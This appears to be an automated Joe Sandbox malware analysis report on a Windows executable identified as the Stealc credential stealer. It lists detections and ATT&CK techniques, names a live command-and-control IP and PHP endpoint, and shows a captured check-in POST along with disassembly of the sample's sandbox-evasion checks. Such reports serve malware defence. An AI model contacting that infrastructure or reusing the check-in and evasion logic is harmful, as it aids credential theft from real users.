                Source: Yara matchFile source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                XDPT5mgIBO.exe54%VirustotalBrowse
                XDPT5mgIBO.exe100%AviraTR/Crypt.TPM.Gen
                XDPT5mgIBO.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpO9XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php.GXDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php09XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e9XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://185.215.113.37/wsXDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmptrueunknown
                        http://185.215.113.37/e2b1563c6670f193.php&FXDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37dXDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1527619
                            Start date and time:2024-10-07 06:46:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 14s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:XDPT5mgIBO.exe
                            renamed because original name is a hash value
                            Original Sample Name:6764f657774334189cbecc80dbb3c855.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 93
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            8ObkdHP9Hq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            MSCy5UvBYg.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLp7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.103
                            TVyKPaL2h0.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.103
                            bUyvu6YU2H.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.19
                            8ObkdHP9Hq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                            • 185.215.113.103
                            MSCy5UvBYg.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                            • 185.215.113.103
                            1mqzOM6eok.exeGet hashmaliciousXmrigBrowse
                            • 185.215.113.66
                            http://noevirbrasil.com/hello.htmlGet hashmaliciousUnknownBrowse
                            • 185.215.113.14
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.945676055051362
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:XDPT5mgIBO.exe
                            File size:1'852'416 bytes
                            MD5:6764f657774334189cbecc80dbb3c855
                            SHA1:9f597f7e92400f0c83f6166d1ec4a9228b3c5514
                            SHA256:ef31a45fb90a7cae12898b6f16cf2c48c06d75ca03f5aaf4fc48bbbd1385be11
                            SHA512:059e54f80ce83028394544299e34e8315b09370ae59defb37b48ce038d749f10b650e5328a6e8a932a8cb7575e92d88e2ee78c337d7d2e347cf42d35c930baa8
                            SSDEEP:49152:/3PScI/Nkko97NjUtnBi1BEVE1WoqsaRz4fpA:/3g/NbC7NAi1BeoqbRz4C
                            TLSH:7F8533A6E7BE57B3FB4D6A77648E833FE7657CABC0780F708E56290444508819BD31A0
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xa9d000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FA3D4ECC2EAh

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x2280048ef81f97f6bd954509670c101ad5128unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2a00000x200ee31bfc8f7dd8fa704e46b147b832605unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            ogawuknu0x4fe0000x19e0000x19e0002b95466ecef938129c8a92b950d42409False0.9949054810160024data7.953433173066681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            hgmhlbrt0x69c0000x10000x600b6f75f94812208bf5a0e190e6b77e611False0.6080729166666666data5.243335117850986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x69d0000x30000x2200bb2e74c558225f6703f7eaae029ed961False0.05974264705882353DOS executable (COM)0.5540394660150704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-07T06:47:05.536145+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649711185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 7, 2024 06:47:03.930320978 CEST4971180192.168.2.6185.215.113.37
                            Oct 7, 2024 06:47:03.935285091 CEST8049711185.215.113.37192.168.2.6
                            Oct 7, 2024 06:47:03.935411930 CEST4971180192.168.2.6185.215.113.37
                            Oct 7, 2024 06:47:03.943397045 CEST4971180192.168.2.6185.215.113.37
                            Oct 7, 2024 06:47:03.948288918 CEST8049711185.215.113.37192.168.2.6
                            Oct 7, 2024 06:47:05.275372982 CEST8049711185.215.113.37192.168.2.6
                            Oct 7, 2024 06:47:05.275547981 CEST4971180192.168.2.6185.215.113.37
                            Oct 7, 2024 06:47:05.285645008 CEST4971180192.168.2.6185.215.113.37
                            Oct 7, 2024 06:47:05.290811062 CEST8049711185.215.113.37192.168.2.6
                            Oct 7, 2024 06:47:05.534358025 CEST8049711185.215.113.37192.168.2.6
                            Oct 7, 2024 06:47:05.536144972 CEST4971180192.168.2.6185.215.113.37
                            Oct 7, 2024 06:47:08.354746103 CEST4971180192.168.2.6185.215.113.37

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 7, 2024 06:47:18.280030012 CEST53548961.1.1.1192.168.2.6

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649711185.215.113.37805928C:\Users\user\Desktop\XDPT5mgIBO.exe
                            TimestampBytes transferredDirectionData
                            Oct 7, 2024 06:47:03.943397045 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 7, 2024 06:47:05.275372982 CEST203INHTTP/1.1 200 OK
                            Date: Mon, 07 Oct 2024 04:47:05 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 7, 2024 06:47:05.285645008 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAA
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a
                            Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
                            Oct 7, 2024 06:47:05.534358025 CEST210INHTTP/1.1 200 OK
                            Date: Mon, 07 Oct 2024 04:47:05 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:00:46:58
                            Start date:07/10/2024
                            Path:C:\Users\user\Desktop\XDPT5mgIBO.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\XDPT5mgIBO.exe"
                            Imagebase:0x640000
                            File size:1'852'416 bytes
                            MD5 hash:6764F657774334189CBECC80DBB3C855
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
                              execution_graph 13422 6569f0 13467 642260 13422->13467 13446 656a64 13447 65a9b0 4 API calls 13446->13447 13448 656a6b 13447->13448 13449 65a9b0 4 API calls 13448->13449 13450 656a72 13449->13450 13451 65a9b0 4 API calls 13450->13451 13452 656a79 13451->13452 13453 65a9b0 4 API calls 13452->13453 13454 656a80 13453->13454 13619 65a8a0 13454->13619 13456 656b0c 13623 656920 GetSystemTime 13456->13623 13458 656a89 13458->13456 13460 656ac2 OpenEventA 13458->13460 13462 656af5 CloseHandle Sleep 13460->13462 13463 656ad9 13460->13463 13465 656b0a 13462->13465 13466 656ae1 CreateEventA 13463->13466 13465->13458 13466->13456 13820 6445c0 13467->13820 13469 642274 13470 6445c0 2 API calls 13469->13470 13471 64228d 13470->13471 13472 6445c0 2 API calls 13471->13472 13473 6422a6 13472->13473 13474 6445c0 2 API calls 13473->13474 13475 6422bf 13474->13475 13476 6445c0 2 API calls 13475->13476 13477 6422d8 13476->13477 13478 6445c0 2 API calls 13477->13478 13479 6422f1 13478->13479 13480 6445c0 2 API calls 13479->13480 13481 64230a 13480->13481 13482 6445c0 2 API calls 13481->13482 13483 642323 13482->13483 13484 6445c0 2 API calls 13483->13484 13485 64233c 13484->13485 13486 6445c0 2 API calls 13485->13486 13487 642355 13486->13487 13488 6445c0 2 API calls 13487->13488 13489 64236e 13488->13489 13490 6445c0 2 API calls 13489->13490 13491 642387 13490->13491 13492 6445c0 2 API calls 13491->13492 13493 6423a0 13492->13493 13494 6445c0 2 API calls 13493->13494 13495 6423b9 13494->13495 13496 6445c0 2 API calls 13495->13496 13497 6423d2 13496->13497 13498 6445c0 2 API calls 13497->13498 13499 6423eb 13498->13499 13500 6445c0 2 API calls 13499->13500 13501 642404 13500->13501 13502 6445c0 2 API calls 13501->13502 13503 64241d 13502->13503 13504 6445c0 2 API calls 13503->13504 13505 642436 13504->13505 13506 6445c0 2 API calls 13505->13506 13507 64244f 13506->13507 13508 6445c0 2 API calls 13507->13508 13509 642468 13508->13509 13510 6445c0 2 API calls 13509->13510 13511 642481 13510->13511 13512 6445c0 2 API calls 13511->13512 13513 64249a 13512->13513 13514 6445c0 2 API calls 13513->13514 13515 6424b3 13514->13515 13516 6445c0 2 API calls 13515->13516 13517 6424cc 13516->13517 13518 6445c0 2 API calls 13517->13518 13519 6424e5 13518->13519 13520 6445c0 2 API calls 13519->13520 13521 6424fe 13520->13521 13522 6445c0 2 API calls 13521->13522 13523 642517 13522->13523 13524 6445c0 2 API calls 13523->13524 13525 642530 13524->13525 13526 6445c0 2 API calls 13525->13526 13527 642549 13526->13527 13528 6445c0 2 API calls 13527->13528 13529 642562 13528->13529 13530 6445c0 2 API calls 13529->13530 13531 64257b 13530->13531 13532 6445c0 2 API calls 13531->13532 13533 642594 13532->13533 13534 6445c0 2 API calls 13533->13534 13535 6425ad 13534->13535 13536 6445c0 2 API calls 13535->13536 13537 6425c6 13536->13537 13538 6445c0 2 API calls 13537->13538 13539 6425df 13538->13539 13540 6445c0 2 API calls 13539->13540 13541 6425f8 13540->13541 13542 6445c0 2 API calls 13541->13542 13543 642611 13542->13543 13544 6445c0 2 API calls 13543->13544 13545 64262a 13544->13545 13546 6445c0 2 API calls 13545->13546 13547 642643 13546->13547 13548 6445c0 2 API calls 13547->13548 13549 64265c 13548->13549 13550 6445c0 2 API calls 13549->13550 13551 642675 13550->13551 13552 6445c0 2 API calls 13551->13552 13553 64268e 13552->13553 13554 659860 13553->13554 13825 659750 GetPEB 13554->13825 13556 659868 13557 659a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13556->13557 13558 65987a 13556->13558 13559 659af4 GetProcAddress 13557->13559 13560 659b0d 13557->13560 13563 65988c 21 API calls 13558->13563 13559->13560 13561 659b46 13560->13561 13562 659b16 GetProcAddress GetProcAddress 13560->13562 13564 659b4f GetProcAddress 13561->13564 13565 659b68 13561->13565 13562->13561 13563->13557 13564->13565 13566 659b71 GetProcAddress 13565->13566 13567 659b89 13565->13567 13566->13567 13568 656a00 13567->13568 13569 659b92 GetProcAddress GetProcAddress 13567->13569 13570 65a740 13568->13570 13569->13568 13571 65a750 13570->13571 13572 656a0d 13571->13572 13573 65a77e lstrcpy 13571->13573 13574 6411d0 13572->13574 13573->13572 13575 6411e8 13574->13575 13576 641217 13575->13576 13577 64120f ExitProcess 13575->13577 13578 641160 GetSystemInfo 13576->13578 13579 641184 13578->13579 13580 64117c ExitProcess 13578->13580 13581 641110 GetCurrentProcess VirtualAllocExNuma 13579->13581 13582 641141 ExitProcess 13581->13582 13583 641149 13581->13583 13826 6410a0 VirtualAlloc 13583->13826 13586 641220 13830 6589b0 13586->13830 13589 641249 __aulldiv 13590 64129a 13589->13590 13591 641292 ExitProcess 13589->13591 13592 656770 GetUserDefaultLangID 13590->13592 13593 6567d3 13592->13593 13594 656792 13592->13594 13600 641190 13593->13600 13594->13593 13595 6567b7 ExitProcess 13594->13595 13596 6567c1 ExitProcess 13594->13596 13597 6567a3 ExitProcess 13594->13597 13598 6567ad ExitProcess 13594->13598 13599 6567cb ExitProcess 13594->13599 13601 6578e0 3 API calls 13600->13601 13603 64119e 13601->13603 13602 6411cc 13607 657850 GetProcessHeap RtlAllocateHeap GetUserNameA 13602->13607 13603->13602 13604 657850 3 API calls 13603->13604 13605 6411b7 13604->13605 13605->13602 13606 6411c4 ExitProcess 13605->13606 13608 656a30 13607->13608 13609 6578e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13608->13609 13610 656a43 13609->13610 13611 65a9b0 13610->13611 13832 65a710 13611->13832 13613 65a9c1 lstrlen 13615 65a9e0 13613->13615 13614 65aa18 13833 65a7a0 13614->13833 13615->13614 13617 65a9fa lstrcpy lstrcat 13615->13617 13617->13614 13618 65aa24 13618->13446 13620 65a8bb 13619->13620 13621 65a90b 13620->13621 13622 65a8f9 lstrcpy 13620->13622 13621->13458 13622->13621 13837 656820 13623->13837 13625 65698e 13626 656998 sscanf 13625->13626 13866 65a800 13626->13866 13628 6569aa SystemTimeToFileTime SystemTimeToFileTime 13629 6569e0 13628->13629 13630 6569ce 13628->13630 13632 655b10 13629->13632 13630->13629 13631 6569d8 ExitProcess 13630->13631 13633 655b1d 13632->13633 13634 65a740 lstrcpy 13633->13634 13635 655b2e 13634->13635 13868 65a820 lstrlen 13635->13868 13638 65a820 2 API calls 13639 655b64 13638->13639 13640 65a820 2 API calls 13639->13640 13641 655b74 13640->13641 13872 656430 13641->13872 13644 65a820 2 API calls 13645 655b93 13644->13645 13646 65a820 2 API calls 13645->13646 13647 655ba0 13646->13647 13648 65a820 2 API calls 13647->13648 13649 655bad 13648->13649 13650 65a820 2 API calls 13649->13650 13651 655bf9 13650->13651 13881 6426a0 13651->13881 13659 655cc3 13660 656430 lstrcpy 13659->13660 13661 655cd5 13660->13661 13662 65a7a0 lstrcpy 13661->13662 13663 655cf2 13662->13663 13664 65a9b0 4 API calls 13663->13664 13665 655d0a 13664->13665 13666 65a8a0 lstrcpy 13665->13666 13667 655d16 13666->13667 13668 65a9b0 4 API calls 13667->13668 13669 655d3a 13668->13669 13670 65a8a0 lstrcpy 13669->13670 13671 655d46 13670->13671 13672 65a9b0 4 API calls 13671->13672 13673 655d6a 13672->13673 13674 65a8a0 lstrcpy 13673->13674 13675 655d76 13674->13675 13676 65a740 lstrcpy 13675->13676 13677 655d9e 13676->13677 14607 657500 GetWindowsDirectoryA 13677->14607 13680 65a7a0 lstrcpy 13681 655db8 13680->13681 14617 644880 13681->14617 13683 655dbe 14762 6517a0 13683->14762 13685 655dc6 13686 65a740 lstrcpy 13685->13686 13687 655de9 13686->13687 13688 641590 lstrcpy 13687->13688 13689 655dfd 13688->13689 14778 645960 13689->14778 13691 655e03 14922 651050 13691->14922 13693 655e0e 13694 65a740 lstrcpy 13693->13694 13695 655e32 13694->13695 13696 641590 lstrcpy 13695->13696 13697 655e46 13696->13697 13698 645960 34 API calls 13697->13698 13699 655e4c 13698->13699 14926 650d90 13699->14926 13701 655e57 13702 65a740 lstrcpy 13701->13702 13703 655e79 13702->13703 13704 641590 lstrcpy 13703->13704 13705 655e8d 13704->13705 13706 645960 34 API calls 13705->13706 13707 655e93 13706->13707 14933 650f40 13707->14933 13709 655e9e 13710 641590 lstrcpy 13709->13710 13711 655eb5 13710->13711 14938 651a10 13711->14938 13713 655eba 13714 65a740 lstrcpy 13713->13714 13715 655ed6 13714->13715 15282 644fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13715->15282 13717 655edb 13718 641590 